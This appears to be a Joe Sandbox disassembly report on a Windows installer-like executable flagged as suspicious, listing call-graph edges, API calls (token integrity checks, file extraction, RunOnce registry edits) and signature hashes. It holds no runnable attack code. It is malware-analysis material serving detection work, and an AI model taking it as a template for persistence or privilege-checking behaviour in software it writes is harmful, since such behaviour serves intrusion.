46674->46677 46678 cf36b2 WaitForSingleObject GetExitCodeThread 46674->46678 46675->46676 46965 cb6ea0 RtlFreeHeap GetLastError ___std_exception_destroy 46676->46965 46677->46678 46685 cf36d1 46678->46685 46679->46651 46680->46681 46681->46655 46682 bbab90 12 API calls 46682->46710 46683->46674 46685->46667 46686 cf3927 46687 d89d16 ___std_exception_destroy 2 API calls 46686->46687 46688 cf393e 46686->46688 46687->46688 46688->46468 46689 cf3853 std::ios_base::_Ios_base_dtor 46689->46666 46689->46686 46690 cf38f5 CloseHandle 46689->46690 46690->46689 46691 bd1a90 26 API calls 46691->46710 46692 bb8190 25 API calls 46692->46710 46693 bb7690 25 API calls 46693->46710 46695 d104e0 HeapAlloc CreateFileW 46714 cf2d28 std::ios_base::_Ios_base_dtor __Wcscoll 46695->46714 46696 bba380 26 API calls 46696->46710 46698 cf370a 46698->46670 46699 cccf10 112 API calls 46699->46710 46701 ccaaa0 28 API calls 46701->46710 46703 cbf600 25 API calls 46703->46710 46705 bb8810 25 API calls 46705->46710 46706 cf3361 FindFirstFileW 46707 cf33b5 FindClose 46706->46707 46706->46714 46707->46714 46709 cf3730 46715 bb8810 25 API calls 46709->46715 46710->46651 46710->46657 46710->46664 46710->46666 46710->46671 46710->46682 46710->46691 46710->46692 46710->46693 46710->46696 46710->46699 46710->46701 46710->46703 46710->46705 46712 bba140 29 API calls 46710->46712 46710->46714 46920 cbed90 25 API calls std::ios_base::_Ios_base_dtor 46710->46920 46921 cbea30 25 API calls 46710->46921 46922 cbf2d0 25 API calls 46710->46922 46923 bba6d0 26 API calls 2 library calls 46710->46923 46924 cb3940 13 API calls 46710->46924 46711 bba380 26 API calls 46711->46714 46712->46710 46714->46695 46714->46698 46714->46706 46714->46709 46714->46710 46714->46711 46716 bb8810 25 API calls 46714->46716 46919 bba6d0 26 API calls 2 library calls 46714->46919 46925 bba6d0 26 API calls 2 library calls 46714->46925 46715->46670 46716->46714 46717->46508 46718->46509 46719->46524 46720->46545 46722 bc4eb7 46721->46722 
46723 bc4ff0 46721->46723 46726 bc4f09 46722->46726 46727 bc4ed9 46722->46727 46724 bba850 HeapAlloc 46723->46724 46725 bc4ffa 46724->46725 46780 bba610 26 API calls 46725->46780 46731 bbab90 12 API calls 46726->46731 46739 bc4f1b 46726->46739 46729 bba380 26 API calls 46727->46729 46732 bc4ee1 46729->46732 46730 bc4fff 46733 bba850 HeapAlloc 46730->46733 46731->46739 46732->46555 46734 bc5009 46733->46734 46735 bba850 HeapAlloc 46734->46735 46736 bc5013 46735->46736 46737 bc50dd 46736->46737 46738 bc505a 46736->46738 46748 bc52c9 46737->46748 46751 bc515b SetWindowTextW 46737->46751 46740 bc50bf GetWindowLongW 46738->46740 46741 bc5061 46738->46741 46739->46725 46739->46730 46739->46734 46742 bc4f43 46739->46742 46747 bc50cc 46740->46747 46743 bc52a7 NtdllDefWindowProc_W 46741->46743 46744 bc5082 GetWindowLongW 46741->46744 46742->46734 46750 bc4f83 __Wcscoll 46742->46750 46746 bc52f6 46743->46746 46744->46743 46745 bc5098 GetWindowLongW SetWindowLongW NtdllDefWindowProc_W 46744->46745 46745->46746 46746->46555 46747->46743 46748->46746 46755 d89d16 ___std_exception_destroy 2 API calls 46748->46755 46749 bc4f9f 46749->46555 46750->46749 46779 d852ef 25 API calls __cftof 46750->46779 46753 bc5177 46751->46753 46754 bc517d 46751->46754 46753->46754 46756 bc520b 46754->46756 46757 bc5193 GlobalAlloc 46754->46757 46755->46746 46756->46748 46782 bc5580 59 API calls 3 library calls 46756->46782 46757->46756 46758 bc51a3 GlobalLock 46757->46758 46762 bc51b8 __Wcscoll 46758->46762 46760 bc523e 46761 bc52b7 46760->46761 46765 bc5257 SetWindowLongW 46760->46765 46761->46748 46764 bc51bd 46762->46764 46781 d852ef 25 API calls __cftof 46762->46781 46766 bc51f1 GlobalUnlock 46764->46766 46768 bc526b 46765->46768 46766->46756 46767 bc529a 46767->46747 46768->46767 46769 d89d16 ___std_exception_destroy 2 API calls 46768->46769 46769->46767 46770->46560 46771->46528 46772->46557 46773->46558 46774->46574 46775->46574 46776->46563 46777->46573 46778->46523 46779->46749 
46780->46730 46781->46764 46782->46760 46784 ccc960 4 API calls 46783->46784 46785 cccf41 46784->46785 46786 cccf59 PathIsUNCW 46785->46786 46787 cccf45 46785->46787 46832 cccb90 46786->46832 46787->46616 46789 cccf8e 46790 ccd121 46789->46790 46792 bba380 26 API calls 46789->46792 46791 bba850 HeapAlloc 46790->46791 46793 ccd12b CreateFileW 46791->46793 46804 cccfa5 46792->46804 46794 ccd18c GetFileSize 46793->46794 46795 ccd19a 46793->46795 46794->46795 46797 ccd1b4 CloseHandle 46795->46797 46798 ccd1c2 46795->46798 46797->46798 46798->46616 46799 bba380 26 API calls 46799->46804 46800 ccd0a7 46800->46616 46801 bd11b0 94 API calls 46802 ccd014 CreateDirectoryW 46801->46802 46803 ccd028 GetLastError 46802->46803 46802->46804 46803->46804 46804->46790 46804->46799 46804->46801 46805 ccaaa0 28 API calls 46804->46805 46806 ccd046 46804->46806 46807 bd11b0 94 API calls 46804->46807 46805->46804 46906 cb6ea0 RtlFreeHeap GetLastError ___std_exception_destroy 46806->46906 46807->46804 46809 ccaada 46808->46809 46814 ccaaeb 46808->46814 46812 ccab7d 46809->46812 46809->46814 46810 ccab3b 46810->46616 46811 bba380 26 API calls 46811->46810 46813 bba850 HeapAlloc 46812->46813 46816 ccab87 __Getctype 46813->46816 46814->46810 46814->46811 46815 ccabf1 46815->46616 46816->46815 46817 ccabf9 46816->46817 46819 ccaaa0 28 API calls 46816->46819 46818 bba850 HeapAlloc 46817->46818 46820 ccac03 46818->46820 46819->46816 46914 ccac80 26 API calls 46820->46914 46822 ccac45 46915 cb1830 26 API calls std::ios_base::_Ios_base_dtor 46822->46915 46824 ccac51 46916 cb1830 26 API calls std::ios_base::_Ios_base_dtor 46824->46916 46826 ccac5d 46917 cb1830 26 API calls std::ios_base::_Ios_base_dtor 46826->46917 46828 ccac6b 46828->46616 46829->46587 46830->46598 46831->46620 46833 bbab90 12 API calls 46832->46833 46834 cccbc9 46833->46834 46835 ccceee 46834->46835 46839 bbab90 12 API calls 46834->46839 46836 bba850 HeapAlloc 46835->46836 46837 cccef8 46836->46837 46838 bba850 HeapAlloc 
46837->46838 46841 cccf02 46838->46841 46840 cccbea 46839->46840 46840->46835 46842 cccbf2 46840->46842 46843 ccc960 4 API calls 46841->46843 46907 cccae0 82 API calls 46842->46907 46844 cccf41 46843->46844 46846 cccf59 PathIsUNCW 46844->46846 46847 cccf45 46844->46847 46849 cccb90 99 API calls 46846->46849 46847->46789 46848 cccc0a 46850 cccd19 46848->46850 46851 cccc15 46848->46851 46852 cccf8e 46849->46852 46853 bd1a90 26 API calls 46850->46853 46854 ccccaa 46851->46854 46868 cccc3b 46851->46868 46855 ccd121 46852->46855 46859 bba380 26 API calls 46852->46859 46856 cccd22 PathIsUNCW 46853->46856 46858 bc4e60 82 API calls 46854->46858 46857 bba850 HeapAlloc 46855->46857 46864 cccd3c 46856->46864 46860 ccd12b CreateFileW 46857->46860 46861 ccccc4 46858->46861 46892 cccfa5 46859->46892 46862 ccd18c GetFileSize 46860->46862 46863 ccd19a 46860->46863 46865 bd1a90 26 API calls 46861->46865 46862->46863 46871 ccd1b4 CloseHandle 46863->46871 46872 ccd1c2 46863->46872 46866 bc4e60 82 API calls 46864->46866 46867 ccccd7 46865->46867 46870 cccd68 46866->46870 46877 bd11b0 94 API calls 46867->46877 46873 bc4e60 82 API calls 46868->46873 46876 bd11b0 94 API calls 46870->46876 46871->46872 46872->46789 46878 cccc55 46873->46878 46874 bba380 26 API calls 46874->46892 46875 ccd0a7 46875->46789 46882 cccd7a 46876->46882 46879 cccca8 46877->46879 46880 bd1a90 26 API calls 46878->46880 46879->46856 46881 cccc68 46880->46881 46883 bd11b0 94 API calls 46881->46883 46884 cccdaf 46882->46884 46885 cccdf8 46882->46885 46883->46879 46908 cae930 38 API calls ___std_exception_destroy 46884->46908 46910 cae930 38 API calls ___std_exception_destroy 46885->46910 46886 bd11b0 94 API calls 46888 ccd014 CreateDirectoryW 46886->46888 46891 ccd028 GetLastError 46888->46891 46888->46892 46890 cccdbb 46909 ccf770 84 API calls 46890->46909 46891->46892 46892->46855 46892->46874 46892->46886 46896 ccaaa0 28 API calls 46892->46896 46897 ccd046 46892->46897 46898 bd11b0 94 API calls 46892->46898 46893 
ccce1d 46911 ccf770 84 API calls 46893->46911 46896->46892 46913 cb6ea0 RtlFreeHeap GetLastError ___std_exception_destroy 46897->46913 46898->46892 46899 ccce30 46900 ccaaa0 28 API calls 46899->46900 46902 ccce5d 46900->46902 46901 cccdce 46901->46789 46902->46837 46903 ccce96 46902->46903 46905 ccaaa0 28 API calls 46902->46905 46912 cb6ea0 RtlFreeHeap GetLastError ___std_exception_destroy 46903->46912 46905->46902 46906->46800 46907->46848 46908->46890 46909->46901 46910->46893 46911->46899 46912->46901 46913->46875 46914->46822 46915->46824 46916->46826 46917->46828 46918->46643 46919->46710 46920->46710 46921->46710 46922->46710 46923->46710 46924->46710 46925->46714 46927 d11676 CreateThread 46926->46927 46928 d11648 CreateEventW 46926->46928 46930 d1178c WaitForSingleObject GetExitCodeThread 46927->46930 46937 d116b2 46927->46937 46969 d11950 46927->46969 46929 d1165d 46928->46929 46929->46927 46931 d117c7 46930->46931 46932 d117b9 CloseHandle 46930->46932 46931->46665 46932->46931 46933 d11770 46964 d7fa13 24 API calls 46933->46964 46934 d117dd 46935 bba850 HeapAlloc 46934->46935 46936 d117e7 46935->46936 46939 bbab90 12 API calls 46936->46939 46937->46933 46937->46934 46938 d11789 46938->46930 46940 d11851 46939->46940 46941 d1193b 46940->46941 46942 d1185b 46940->46942 46943 bba850 HeapAlloc 46941->46943 46946 d11879 46942->46946 46947 d11887 46942->46947 46944 d11945 46943->46944 46945 d1195f WaitForSingleObject 46944->46945 46954 d11968 46944->46954 46945->46954 46949 bba140 29 API calls 46946->46949 46947->46947 46966 bba6d0 26 API calls 2 library calls 46947->46966 46950 d11885 46949->46950 46953 cccf10 112 API calls 46950->46953 46951 d119eb 46952 bba850 HeapAlloc 46951->46952 46961 d119f5 std::ios_base::_Ios_base_dtor 46952->46961 46957 d118c0 46953->46957 46954->46951 46955 cf1370 HeapAlloc 46954->46955 46956 d1199c 46954->46956 46962 d119cb 46954->46962 46955->46954 46956->46951 46956->46962 46968 d117f0 125 API calls std::ios_base::_Ios_base_dtor 
46956->46968 46967 d67900 14 API calls 46957->46967 46961->46665 46962->46665 46963 d118ed 46963->46665 46964->46938 46965->46689 46966->46950 46967->46963 46968->46956 46970 d1195f WaitForSingleObject 46969->46970 46976 d11968 46969->46976 46970->46976 46971 d119eb 46972 bba850 HeapAlloc 46971->46972 46977 d119f5 std::ios_base::_Ios_base_dtor 46972->46977 46973 cf1370 HeapAlloc 46973->46976 46975 d119cb 46976->46971 46976->46973 46976->46975 46978 d1199c 46976->46978 46978->46971 46978->46975 46979 d117f0 125 API calls std::ios_base::_Ios_base_dtor 46978->46979 46979->46978 46981 d98218 RtlFreeHeap 46980->46981 46983 d9823a __dosmaperr __Wcscoll 46980->46983 46982 d9822d GetLastError 46981->46982 46981->46983 46982->46983 46983->46499 46984 cf5d90 46985 bd1a90 26 API calls 46984->46985 46986 cf5dbf 46985->46986 46987 bd1a90 26 API calls 46986->46987 46988 cf5dcb 46987->46988 46991 cd7070 46988->46991 46990 cf5dd3 46992 bba380 26 API calls 46991->46992 46993 cd70af 46992->46993 46994 cd70d0 GetFileVersionInfoSizeW 46993->46994 47012 bba550 26 API calls 2 library calls 46993->47012 46997 cd70f5 46994->46997 46998 cd70e8 46994->46998 46996 cd70cd 46996->46994 46997->46990 46998->46997 46999 cd711a GetFileVersionInfoW 46998->46999 47013 bba550 26 API calls 2 library calls 46998->47013 46999->46997 47001 cd7131 46999->47001 47003 bbab90 12 API calls 47001->47003 47002 cd7117 47002->46999 47004 cd7136 47003->47004 47005 cd7280 47004->47005 47008 cd7140 47004->47008 47006 bba850 HeapAlloc 47005->47006 47007 cd728a 47006->47007 47010 cd71af 47008->47010 47014 bba550 26 API calls 2 library calls 47008->47014 47010->46997 47015 bba6d0 26 API calls 2 library calls 47010->47015 47012->46996 47013->47002 47014->47010 47015->46997
APIs
• SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C,?,?,?), ref: 00CE1B65
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00CE1C60
• GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D,?,?,?), ref: 00CE1D60
• GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00CE1E45
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00CE1F8C
• SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D,?,?,?), ref: 00CE2072
• __Init_thread_footer.LIBCMT ref: 00CE20E6
• LoadLibraryW.KERNEL32(shfolder.dll,?,?,?), ref: 00CE20FC
• GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00CE212E
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00CE219C
• SHGetMalloc.SHELL32(00000000), ref: 00CE21B5
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Directory$FolderPathWindows$AddressAllocFileFromHeapInit_thread_footerLibraryListLoadLocationMallocModuleNameProcSpecialSystem
• String ID: ProgramFiles64Folder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
• API String ID: 1264188777-2142986682
• Opcode ID: 991b977495fb7f2cd7ab78372da4a388889d5f793ae149918da1473e6d5abf94
• Instruction ID: da6587148855af61869b2a7ce651c77ed076feecc15fec01ec8b758fd0af39c4
• Opcode Fuzzy Hash: 991b977495fb7f2cd7ab78372da4a388889d5f793ae149918da1473e6d5abf94
• Instruction Fuzzy Hash: AF320570A002858FDB24DF29CC45BBDB3B5EF54310F1842D9E916A7291EB71AF85DB90
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
• GetTickCount.KERNEL32 ref: 00CE6874
• __Xtime_get_ticks.LIBCPMT ref: 00CE687C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CE68C6
• __Init_thread_footer.LIBCMT ref: 00CE6AB1
• GetCurrentProcess.KERNEL32(00000008,?,1FC3D414), ref: 00CE6CA8
• OpenProcessToken.ADVAPI32(00000000), ref: 00CE6CAF
• GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00CE6CDE
• CloseHandle.KERNEL32(00000000), ref: 00CE6CF3
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
  • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
  • Part of subcall function 00CD1DA0: __Init_thread_footer.LIBCMT ref: 00CD1E16
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CE74B5
• CreateThread.KERNEL32 ref: 00CE74F0
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00CE7523
  • Part of subcall function 00CEA490: GetCurrentProcess.KERNEL32(?,1FC3D414), ref: 00CEA4F9
  • Part of subcall function 00CEA490: IsWow64Process.KERNEL32(00000000), ref: 00CEA500
  • Part of subcall function 00CEA490: _wcsrchr.LIBVCRUNTIME ref: 00CEA581
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Process$Init_thread_footer$CreateCurrentHeapToken$AllocCloseCountEventFindHandleInformationObjectOpenResourceSingleThreadTickUnothrow_t@std@@@WaitWow64Xtime_get_ticks__ehfuncinfo$??2@_wcsrchr
• String ID: /uninstall$VersionString$\/:*?"<>|$\\?\
• API String ID: 1945640678-654522458
• Opcode ID: 39f8349507b80d0d7b33220da1b35342aab2aa8b18699cca32b69d8060668622
• Instruction ID: 3a65612a0adfd269b6e947359e142cb9cb1b4b4c43af8ba166bd1ee49dfe4b21
• Opcode Fuzzy Hash: 39f8349507b80d0d7b33220da1b35342aab2aa8b18699cca32b69d8060668622
• Instruction Fuzzy Hash: D8B2DE70E00649DFDB14DFA9C845BAEBBF4FF04314F148269E825AB291DB74AE45CB90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• FindFirstFileW.KERNEL32(?,00000000,1FC3D414,?,00000000,00000000), ref: 00CF4032
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CF4064
• CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00CF418C
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00CF4236
• CreateFileW.KERNEL32(1FC3D414,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,8000000B,1FC3D414), ref: 00CF4466
• SetFilePointer.KERNEL32(8000000B,7FFFFFFF,00000000,00000000,1FC3D414), ref: 00CF44C5
• SetEndOfFile.KERNEL32(8000000B), ref: 00CF44CE
• FindCloseChangeNotification.KERNEL32(8000000B), ref: 00CF44E7
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
• DeleteFileW.KERNEL32(?,00000000,?,?,?,80004005,?,?,8000000B,1FC3D414,?,00000000,00000000), ref: 00CF457B
• CloseHandle.KERNEL32(?,1FC3D414,00000000,?,?,00000000,?,?,?), ref: 00CF465B
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CloseFile$FindHandle$HeapInit_thread_footer$AllocChangeCreateDeleteFirstNotificationPointerProcess
• String ID: %sholder%d.aiph$<3$<3$<3$Not enough disk space to extract file:
• API String ID: 707736400-357627853
• Opcode ID: d7e9b277e4d50881c32ad20d07529a13a17a07ed3057ec5ae80632a8e7bba5b5
• Instruction ID: b33c3955c538a59bc9872d96814d7db6f279a144878dd39ba5b244a915d43da8
• Opcode Fuzzy Hash: d7e9b277e4d50881c32ad20d07529a13a17a07ed3057ec5ae80632a8e7bba5b5
• Instruction Fuzzy Hash: 3952F771900609DFDB14DF68CC84BAEBBF4FF45314F148269EA25AB391DB70AA44CB91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph (Executed / Not Executed blocks) not reproduced; entry block d0ac30-d0acc9 (GetUserNameW). The call sites of its blocks are listed under APIs below.]
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00D0ACC5
• GetLastError.KERNEL32 ref: 00D0ACCB
• GetUserNameW.ADVAPI32(?,?), ref: 00D0AD13
• GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 00D0AD49
• GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 00D0AD93
• RegDeleteValueW.KERNEL32(?,?,00000000,80000001,00000001,00000000,1FC3D414), ref: 00D0AF98
• RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,1FC3D414), ref: 00D0AFC8
• RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,1FC3D414,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D0B10D
• RegDeleteKeyW.ADVAPI32(?,00000000), ref: 00D0B1C0
• RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 00D0B202
• RegDeleteValueW.KERNEL32(?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 00D0B2F6
• RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 00D0B338
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CloseDelete$EnvironmentNameUserValueVariable$ErrorInfoLastQuery
• String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
• API String ID: 3650088056-4079418357
• Opcode ID: 526670dfa6f33f7e89fb736548a02bb9c5316dc358f61c98b3aa55648899df87
• Instruction ID: 3c58d5428d5f77cb01f97495e5863992ada97fe917a34c396706eb7436ba8d61
• Opcode Fuzzy Hash: 526670dfa6f33f7e89fb736548a02bb9c5316dc358f61c98b3aa55648899df87
• Instruction Fuzzy Hash: A7226C70D14208DFDB14DFA8CD95BEEBBB4EF14304F208159E515B7291EBB46A88CBA1
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Init_thread_footer$HeapProcess_wcsrchr
• String ID: <3$<3$<3$<3
• API String ID: 3663133277-2587302598
• Opcode ID: 0384505237efe84d020fc9965b41f355ba8f2324b270740dd7d7e9ddd253eaff
• Instruction ID: 11192fe7da03d457b348fc426e49b7399aee67036e054bac34149acf42950e0a
• Opcode Fuzzy Hash: 0384505237efe84d020fc9965b41f355ba8f2324b270740dd7d7e9ddd253eaff
• Instruction Fuzzy Hash: 5DB2AA709016589FDB66CF28CC84BADBBF8AF44314F1482D9E519AB291DB70AF84CF51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph (Executed / Not Executed blocks) not reproduced; entry block cce790-cce7ed (GetCurrentProcess, OpenProcessToken). The call sites of its blocks are listed under APIs below.]
APIs
• GetCurrentProcess.KERNEL32 ref: 00CCE7D8
• OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CCE7E5
• GetLastError.KERNEL32 ref: 00CCE7EF
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,000000FF), ref: 00CCE819
• GetLastError.KERNEL32 ref: 00CCE81F
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),000000FF,000000FF,000000FF,000000FF), ref: 00CCE845
• AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CCE878
• EqualSid.ADVAPI32(00000000,?), ref: 00CCE887
• FreeSid.ADVAPI32(?), ref: 00CCE896
• FindCloseChangeNotification.KERNEL32(00000000), ref: 00CCE8D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
• String ID: <3
• API String ID: 2037597787-878583566
• Opcode ID: d01eae187b148888990531bf5b6358a1319a986f4db99dca44398f8d3b560707
• Instruction ID: 46eafcde265b362d9fd2d3c9fe4c524bb7956e6ac8c17d253e78fe036cc61f83
• Opcode Fuzzy Hash: d01eae187b148888990531bf5b6358a1319a986f4db99dca44398f8d3b560707
• Instruction Fuzzy Hash: 4C411671900219AFEF109FA6CD49BEEBBB8EF09714F10401AE511B2290DB799A48DB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C8A671
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
  • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
• LoadLibraryExW.KERNEL32(?,00000000,00000000,00DDCDED,000000FF), ref: 00C8A744
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
